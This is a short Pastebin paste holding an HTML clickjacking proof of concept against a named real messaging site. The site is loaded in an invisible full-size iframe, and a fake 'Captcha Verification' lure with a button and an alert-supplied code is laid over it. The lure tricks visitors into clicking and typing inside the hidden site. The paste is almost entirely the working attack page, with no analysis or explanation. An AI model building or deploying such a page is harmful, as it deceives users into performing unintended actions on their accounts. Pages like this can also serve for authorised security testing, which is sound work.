Advertisement
Guest User

Untitled

a guest
Jul 17th, 2019
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. <html>
  2. <head>
  3. <style>
  4. iframe { /* iframe from the victim site */
  5. width: 1000px;
  6. height: 500px;
  7. position: absolute;
  8. top:15; left:-20px;
  9. opacity: 0; /* in real opacity:0 */
  10. z-index: 1;
  11. }
  12. button{
  13. position: absolute;
  14. top:160; left:10px;
  15. }
  16. </style>
  17. </head>
  18. <body onload="javascript:alert('your code is: TEST2')"">
  19.  
  20. <!-- The url from the victim site -->
  21. <iframe src="https://tamtam.ok.ru/"></iframe>
  22. <br><br><br><br>
  23. <font color=red size=100>Captcha Verification!</font><br>
  24. <font color=black><b>to confirm that are human click on <font color=green>VERIFY</font> and type the <font color=blue>CODE</font> that we will give you</font>
  25. <button>Verify!</button>
  26.  
  27. </body>
  28. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement